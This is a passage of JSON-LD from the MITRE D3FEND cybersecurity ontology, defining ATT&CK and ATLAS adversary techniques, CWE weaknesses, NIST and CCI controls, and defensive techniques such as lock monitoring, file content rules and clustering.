      "d3f:definition": "Adversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected. Methods of I/O image manipulation may include overriding the I/O table via direct memory manipulation or using the override function used for testing PLC programs. (Citation: Dr. Kelvin T. Erickson December 2010) During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules.",
      "rdfs:label": "Manipulate I/O Image - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Manipulate I/O Image"
    },
    {
      "@id": "d3f:T1021",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1021",
      "d3f:definition": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.",
      "d3f:produces": {
        "@id": "d3f:IntranetNetworkTraffic"
      },
      "rdfs:label": "Remote Services",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:N60f001fc8fc44260b3dea50a2467b367"
        }
      ]
    },
    {
      "@id": "_:N60f001fc8fc44260b3dea50a2467b367",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:UserInitScript",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A script used to initialize and configure elements of the user's applications and user environment.",
      "rdfs:label": "User Init Script",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutableScript"
        },
        {
          "@id": "d3f:InitScript"
        },
        {
          "@id": "d3f:UserLogonInitResource"
        }
      ]
    },
    {
      "@id": "d3f:T1655",
      "@type": "owl:Class",
      "d3f:attack-id": "T1655",
      "d3f:definition": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name, location, or appearance of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.",
      "rdfs:label": "Masquerading - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Masquerading"
    },
    {
      "@id": "d3f:AML.T0034",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0034",
      "d3f:definition": "Adversaries may target different AI services to send useless queries or computationally expensive inputs to increase the cost of running services at the victim organization.\nSponge examples are a particular type of adversarial data designed to maximize energy consumption and thus operating cost.",
      "rdfs:label": "Cost Harvesting - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0034"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASImpactTechnique"
      },
      "skos:prefLabel": "Cost Harvesting"
    },
    {
      "@id": "d3f:T1531",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1531",
      "d3f:definition": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)",
      "d3f:modifies": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Account Access Removal",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ImpactTechnique"
        },
        {
          "@id": "_:N0f2400e7390047ec98a9c107610e2a4d"
        }
      ]
    },
    {
      "@id": "_:N0f2400e7390047ec98a9c107610e2a4d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-6_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Least Privilege | Privileged Accounts",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "AC-6(5)"
    },
    {
      "@id": "d3f:ElectronicLockMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ElectronicLockMonitoring"
      ],
      "d3f:d3fend-id": "D3-ELM",
      "d3f:definition": "Monitoring electronic lock and door hardware states and access events (e.g., locked/unlocked, access granted/denied, door forced/held, tamper) to detect and respond to unauthorized entry.",
      "d3f:kb-article": "## How it works\n\nElectronic lock monitoring collects status and events from door controllers, readers (badge/PIV, keypad), and door hardware (door position switch, request-to-exit, bolt/latch, tamper). The physical access control system (PACS) logs access decisions, correlates door-held/forced conditions, and generates alarms for response. Secure, supervised reader links, such as Open Supervised Device Protocol (OSDP), help detect wiring faults and reduce credential interception. Integration with video systems can pop relevant camera views on lock-related alarms.\n\n## Considerations\n\n* Use encrypted, supervised reader-to-controller protocols to protect credentials and detect wiring faults.\n* Harden door controllers and isolate the PACS network to limit the attack surface.\n* Configure fail-safe or fail-secure behavior and emergency release to meet life-safety requirements.\n* Tune alarms for door-held, door-forced, and invalid retries to reduce noise while catching misuse.\n* Supervise inputs, provide backup power, and regularly test door, bolt, and tamper sensors to ensure reliability.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FIPS-201-3"
        },
        {
          "@id": "d3f:Reference-NIST-SP800-116r1"
        },
        {
          "@id": "d3f:Reference-NIST-Special-Publication-800-53-Revision-5"
        },
        {
          "@id": "d3f:Reference-SIA-OSDP-2-2"
        }
      ],
      "d3f:monitors": {
        "@id": "d3f:ElectronicCombinationLock"
      },
      "d3f:synonym": [
        "Door Lock Monitoring",
        "Lock State Monitoring"
      ],
      "rdfs:label": "Electronic Lock Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalAccessMonitoring"
        },
        {
          "@id": "_:N87d65343e5b5470e9555ae7659da4d3a"
        }
      ]
    },
    {
      "@id": "_:N87d65343e5b5470e9555ae7659da4d3a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ElectronicCombinationLock"
      }
    },
    {
      "@id": "d3f:WHOISCompatibleDomainRegistration",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DomainRegistration"
      ],
      "rdfs:label": "WHOIS Compatible Domain Registration"
    },
    {
      "@id": "d3f:DHCPReleaseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DHCP client sends a RELEASE message to relinquish its assigned IP address and cancel any remaining lease duration.",
      "rdfs:label": "DHCP Release Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DHCPEvent"
        },
        {
          "@id": "_:N984fcccb49e24c6382643069c6af4330"
        }
      ],
      "skos:altLabel": "DHCPRELEASE"
    },
    {
      "@id": "_:N984fcccb49e24c6382643069c6af4330",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPAckEvent"
      }
    },
    {
      "@id": "d3f:CWE-65",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-65",
      "d3f:definition": "The product, when opening a file or directory, does not sufficiently handle when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files.",
      "rdfs:label": "Windows Hard Link",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-59"
      }
    },
    {
      "@id": "d3f:CWE-414",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-414",
      "d3f:definition": "A product does not check to see if a lock is present before performing sensitive operations on a resource.",
      "rdfs:label": "Missing Lock Check",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-667"
      }
    },
    {
      "@id": "d3f:M1031",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "Network Intrusion Prevention"
    },
    {
      "@id": "d3f:T1401",
      "@type": "owl:Class",
      "d3f:attack-id": "T1401",
      "d3f:definition": "Adversaries may request device administrator permissions to perform malicious actions.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1626.001",
      "rdfs:label": "Device Administrator Permissions - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1626.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePrivilegeEscalationTechnique"
      },
      "skos:prefLabel": "Device Administrator Permissions"
    },
    {
      "@id": "d3f:MicrosoftHTMLApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML, and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript.",
      "d3f:may-contain": {
        "@id": "d3f:ExecutableScript"
      },
      "d3f:synonym": "HTA",
      "rdfs:isDefinedBy": {
        "@id": "dbr:HTML_Application"
      },
      "rdfs:label": "Microsoft HTML Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HTMLFile"
        },
        {
          "@id": "_:Nfffd96069f7d47b8b44cac4f6e86c7be"
        }
      ]
    },
    {
      "@id": "_:Nfffd96069f7d47b8b44cac4f6e86c7be",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "d3f:CWE-1050",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1050",
      "d3f:definition": "The product has a loop body or loop condition that contains a control element that directly or indirectly consumes platform resources, e.g. messaging, sessions, locks, or file descriptors.",
      "rdfs:label": "Excessive Platform Resource Consumption within a Loop",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:stage",
      "@type": [
        "owl:DatatypeProperty",
        "owl:FunctionalProperty"
      ],
      "rdfs:label": "stage",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "_:Nf830dd3f129a45fbb3d28d1578625cd5",
      "@type": "owl:AllDisjointClasses",
      "owl:members": {
        "@list": [
          {
            "@id": "d3f:Clustering"
          },
          {
            "@id": "d3f:Grouping"
          },
          {
            "@id": "d3f:Histogramming"
          }
        ]
      }
    },
    {
      "@id": "d3f:Router",
      "@type": "owl:Class",
      "d3f:definition": "A router is a networking device that forwards data packets between computer networks. Routers perform the traffic directing functions on the Internet. Data sent through the internet, such as a web page or email, is in the form of data packets. A packet is typically forwarded from one router to another router through the networks that constitute an internetwork (e.g. the Internet) until it reaches its destination node.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Router_(computing)"
      },
      "rdfs:label": "Router",
      "rdfs:subClassOf": {
        "@id": "d3f:ComputerNetworkNode"
      }
    },
    {
      "@id": "d3f:PE32PLUSExecutableFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableBinary"
      ],
      "rdfs:label": "PE32+ Executable File"
    },
    {
      "@id": "d3f:Procedure",
      "@type": "owl:Class",
      "rdfs:label": "Procedure",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Plan"
        },
        {
          "@id": "_:Nff4756362af6433fa98eef79b0eeaa6f"
        },
        {
          "@id": "_:Na33cfe2ab9814d3f8c88bce523fecc4a"
        }
      ]
    },
    {
      "@id": "_:Nff4756362af6433fa98eef79b0eeaa6f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:implements"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Technique"
      }
    },
    {
      "@id": "_:Na33cfe2ab9814d3f8c88bce523fecc4a",
      "@type": "owl:Restriction",
      "owl:allValuesFrom": {
        "@id": "d3f:Step"
      },
      "owl:onProperty": {
        "@id": "d3f:start"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForDetectingSuspiciousAdministrativeActivity_VectraNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180077186A1"
      },
      "d3f:kb-abstract": "Disclosed is an improved approach for identifying suspicious administrative host activity within a network. Network traffic is examined to learn the behavior of hosts within a network. This provides an effective way of determining whether or not a host is performing suspicious activity over an administrative protocol.",
      "d3f:kb-author": "Nicolas Beauchesne; Kevin Song-Kai Ni",
      "d3f:kb-mitre-analysis": "Collect network traffic metadata directed at administrative services over a period of time to establish a baseline. This baseline is then used to determine suspicious activity that falls outside of the established baseline.",
      "d3f:kb-organization": "Vectra Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:AdministrativeNetworkActivityAnalysis"
      },
      "d3f:kb-reference-title": "Method and system for detecting suspicious administrative activity",
      "rdfs:label": "Reference - Method and system for detecting suspicious administrative activity - Vectra Networks Inc"
    },
    {
      "@id": "d3f:Group",
      "@type": "owl:Class",
      "rdfs:label": "Group",
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:SharedComputer",
      "@type": "owl:Class",
      "d3f:definition": "A computer whose resources are intended to be shared widely.",
      "rdfs:label": "Shared Computer",
      "rdfs:seeAlso": {
        "@id": "dbr:Time-sharing"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ClientComputer"
      }
    },
    {
      "@id": "d3f:SSHEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the Secure Shell (SSH) protocol, a cryptographic network protocol designed to provide secure remote login, command execution, and data transfer. SSH facilitates encrypted communication between clients and servers, ensuring confidentiality, integrity, and authenticity.",
      "rdfs:label": "SSH Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/ssh_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationLayerEvent"
        },
        {
          "@id": "d3f:TCPEvent"
        },
        {
          "@id": "_:N24a2246a9851423788caa731d9202689"
        }
      ]
    },
    {
      "@id": "_:N24a2246a9851423788caa731d9202689",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SSHSession"
      }
    },
    {
      "@id": "d3f:CWE-676",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-676",
      "d3f:definition": "The product invokes a potentially dangerous function that could introduce a vulnerability if it is used incorrectly, but the function can also be used safely.",
      "rdfs:label": "Use of Potentially Dangerous Function",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1177"
      }
    },
    {
      "@id": "d3f:T1609",
      "@type": "owl:Class",
      "d3f:attack-id": "T1609",
      "d3f:definition": "Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)",
      "rdfs:label": "Container Administration Command",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:FileContentRules",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileContentRules"
      ],
      "d3f:d3fend-id": "D3-FCR",
      "d3f:definition": "Employing a pattern matching rule language to analyze the content of files.",
      "d3f:kb-article": "## How it works\nRules, often called signatures, are used for both generic and targeted malware detection. The rules are usually expressed in a domain specific language (DSL), then deployed to software that scans files for matches. The rules are developed and broadly distributed by commercial vendors, or they are developed and deployed by enterprise security teams to address highly targeted or custom malware. Conceptually, there are public and private rule sets. Both leverage the same technology, but they are intended to detect different types of cyber adversaries.\n\n## Considerations\n* Patterns expressed in the DSLs range in their complexity. Some scanning engines support file parsing and normalization for high fidelity matching, others support only simple regular expression matching against raw file data. Engineers must make a trade-off in terms of:\n     * The fidelity of the matching capabilities in order to balance high recall with avoiding false positives,\n     * The computational load for scanning, and\n     * The resilience of the engine to deal with adversarial content presented in different forms-- content which in some cases is designed to exploit or defeat the scanning engines.\n * Signature libraries can become large over time and impact scanning performance.\n * Some vendors who sell signatures have to delete old signatures over time.\n * Simple signatures against raw content cannot match against encoded, encrypted, or sufficiently obfuscated content.\n\n## Implementations\n * YARA\n * ClamAV",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-ComputationalModelingAndClassificationOfDataStreams_CrowdstrikeInc"
        },
        {
          "@id": "d3f:Reference-DetectingScript-basedMalware_CrowdstrikeInc"
        },
        {
          "@id": "d3f:Reference-DistributedMeta-informationQueryInANetwork_Bit9Inc"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodsThereofForLogicalIdentificationOfMaliciousThreatsAcrossAPluralityOfEnd-pointDevicesCommunicativelyConnectedByANetwork_PaloAltoNetworksIncCyberSecdoLtd"
        }
      ],
      "d3f:synonym": [
        "File Content Signatures",
        "File Signatures"
      ],
      "rdfs:label": "File Content Rules",
      "rdfs:subClassOf": {
        "@id": "d3f:FileContentAnalysis"
      }
    },
    {
      "@id": "d3f:ImageFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A file that contains graphics data.",
      "rdfs:label": "Image File",
      "rdfs:subClassOf": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:MicrosoftWordWBKFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "rdfs:label": "Microsoft Word WBK File"
    },
    {
      "@id": "d3f:CWE-597",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-597",
      "d3f:definition": "The product uses the wrong operator when comparing a string, such as using \"==\" when the .equals() method should be used instead.",
      "rdfs:label": "Use of Wrong Operator in String Comparison",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-480"
        },
        {
          "@id": "d3f:CWE-595"
        }
      ]
    },
    {
      "@id": "d3f:T1631.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1631.001",
      "d3f:definition": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process.",
      "rdfs:label": "Ptrace System Calls - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1631"
      },
      "skos:prefLabel": "Ptrace System Calls"
    },
    {
      "@id": "d3f:OTController",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:OTControlProgram"
      },
      "d3f:definition": "An OT Controller is an industrial control device that automatically regulates one or more controlled variables in response to command inputs and real-time feedback signals.",
      "d3f:has-operating-mode": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "d3f:manages": {
        "@id": "d3f:OTControlLogicProcess"
      },
      "d3f:powered-by": {
        "@id": "d3f:OTPowerSupply"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://csrc.nist.gov/glossary/term/controller"
      },
      "rdfs:label": "OT Controller",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEmbeddedComputer"
        },
        {
          "@id": "_:N885c14846ab84b6385a3587f3dac5499"
        },
        {
          "@id": "_:Nc12d0ae4599f48cd9f5848704136a00b"
        },
        {
          "@id": "_:N870a26e3cbec4d1f8be3a2093a6b9039"
        },
        {
          "@id": "_:N3b26b69a0e04438484db4d814891959b"
        }
      ]
    },
    {
      "@id": "_:N885c14846ab84b6385a3587f3dac5499",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "_:Nc12d0ae4599f48cd9f5848704136a00b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-operating-mode"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:N870a26e3cbec4d1f8be3a2093a6b9039",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlLogicProcess"
      }
    },
    {
      "@id": "_:N3b26b69a0e04438484db4d814891959b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:powered-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTPowerSupply"
      }
    },
    {
      "@id": "d3f:ClientApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A client application is software that accesses a service made available by a server. The server is often (but not always) on another computer system, in which case the client accesses the service by way of a network. The term applies to the role that programs or devices play in the client-server model",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Client_(computing)"
      },
      "rdfs:label": "Client Application",
      "rdfs:seeAlso": {
        "@id": "d3f:T1554"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:M1021",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "M1021 scope is broad, touches on an wide variety of techniques in d3fend.",
      "d3f:related": [
        {
          "@id": "d3f:DNSAllowlisting"
        },
        {
          "@id": "d3f:DNSDenylisting"
        },
        {
          "@id": "d3f:FileAnalysis"
        },
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        },
        {
          "@id": "d3f:URLAnalysis"
        }
      ],
      "rdfs:label": "Restrict Web-Based Content"
    },
    {
      "@id": "d3f:T1606.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1606.002",
      "d3f:definition": "An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)",
      "rdfs:label": "SAML Tokens",
      "rdfs:subClassOf": {
        "@id": "d3f:T1606"
      }
    },
    {
      "@id": "d3f:T1608.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1608.001",
      "d3f:definition": "Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.",
      "rdfs:label": "Upload Malware",
      "rdfs:subClassOf": {
        "@id": "d3f:T1608"
      }
    },
    {
      "@id": "d3f:RDPInitialResponseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an RDP server responds to an initial request from a client, presenting its supported capabilities and agreeing to proceed with session negotiation.",
      "rdfs:label": "RDP Initial Response Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RDPEvent"
        },
        {
          "@id": "_:N391306d2de2840f79f799605d21f5c8c"
        }
      ]
    },
    {
      "@id": "_:N391306d2de2840f79f799605d21f5c8c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RDPInitialRequestEvent"
      }
    },
    {
      "@id": "d3f:T1480",
      "@type": "owl:Class",
      "d3f:attack-id": "T1480",
      "d3f:definition": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)",
      "rdfs:label": "Execution Guardrails",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:CCI-000764_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        },
        {
          "@id": "d3f:Multi-factorAuthentication"
        },
        {
          "@id": "d3f:One-timePassword"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uniquely identifies and authenticates organizational users (or processes acting on behalf of organizational users).",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000764"
    },
    {
      "@id": "d3f:CWE-788",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-788",
      "d3f:definition": "The product reads or writes to a buffer using an index or pointer that references a memory location after the end of the buffer.",
      "rdfs:label": "Access of Memory Location After End of Buffer",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-119"
      }
    },
    {
      "@id": "d3f:CWE-805",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-805",
      "d3f:definition": "The product uses a sequential operation to read or write a buffer, but it uses an incorrect length value that causes it to access memory that is outside of the bounds of the buffer.",
      "rdfs:label": "Buffer Access with Incorrect Length Value",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-119"
      }
    },
    {
      "@id": "d3f:RegSetValueExW",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SetSystemConfigValue"
      ],
      "rdfs:label": "RegSetValueExW"
    },
    {
      "@id": "d3f:MailNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Email"
      },
      "d3f:definition": "Mail traffic is network traffic that uses a standard mail transfer protocol.",
      "rdfs:label": "Mail Network Traffic",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTraffic"
        },
        {
          "@id": "_:Ne38f7a0f1a8746b2bb1e4e06b29509f6"
        }
      ]
    },
    {
      "@id": "_:Ne38f7a0f1a8746b2bb1e4e06b29509f6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:CAPEC-663",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CommonAttackPattern"
      ],
      "d3f:capec-id": "CAPEC-553",
      "rdfs:isDefinedBy": {
        "@id": "https://capec.mitre.org/data/definitions/663.html"
      },
      "rdfs:label": "Exploitation of Transient Instruction Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:CommonAttackPattern"
      }
    },
    {
      "@id": "d3f:CWE-797",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-797",
      "d3f:definition": "The product receives data from an upstream component, but only accounts for special elements at an absolute position (e.g. \"byte number 10\"), thereby missing remaining special elements that may exist before sending it to a downstream component.",
      "rdfs:label": "Only Filtering Special Elements at an Absolute Position",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-795"
      }
    },
    {
      "@id": "d3f:AgglomerativeClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AC",
      "d3f:definition": "Agglomerative Clustering is a type of hierarchical clustering method where data points are grouped together based on similarity. Initially, each data point is treated as an individual cluster, and then in successive iterations, the closest clusters are merged until only one large cluster remains or until a specified stopping criterion is met.",
      "d3f:kb-article": "## How it works\n\nAgglomerative clustering starts with each data point as its own cluster. The algorithm then iterates, identifying the two clusters that are closest to each other based on a defined distance metric (e.g., Euclidean, Manhattan). These two clusters are then merged into a single cluster. This process continues iteratively, merging the closest pairs of clusters in each step until all data points are merged into a single cluster or until other stopping criteria are achieved. A dendrogram, which is a tree-like diagram, can be used to represent the sequence of merges, providing a visual representation of the hierarchical structure of data.\n\n## Considerations\n\n- **Choice of Distance Metric**: The outcome can vary significantly depending on the chosen distance metric (e.g., Euclidean, Manhattan).\n\n- **Scalability**: Agglomerative clustering can be computationally intensive for large datasets.\n\n- **Sensitivity**: The method can be sensitive to outliers, which might affect the quality of the clusters formed.\n\n## Key Test Considerations\n\n- **Unsupervised Learning**:\n\n  - **Number of Clusters**: Determine an optimal number of clusters using the dendrogram and techniques like the elbow method.\n\n- **Cluster Analysis**:\n\n    - **Silhouette Score**: Evaluates how similar an object is to its own cluster compared to other clusters. A higher silhouette score indicates that the object is well matched to its own cluster and poorly matched to neighboring clusters.\n\n    - **Dunn Index**: Measures the ratio between the smallest distance between observations not in the same cluster to the largest intra-cluster distance.\n\n- **Hierarchical Clustering**:\n\n    - **Cophenetic Correlation Coefficient**: Measures the correlation between the distances of points in feature space and their distances on the dendrogram. Helps assess the fidelity of the dendrogram in preserving pairwise distances between samples.\n\n- **Agglomerative Clustering**:\n\n    - **Linkage Criteria**: Test different linkage criteria (e.g., single, complete, average) to determine which produces the most cohesive clusters for the data at hand.\n\n  ## Platforms, 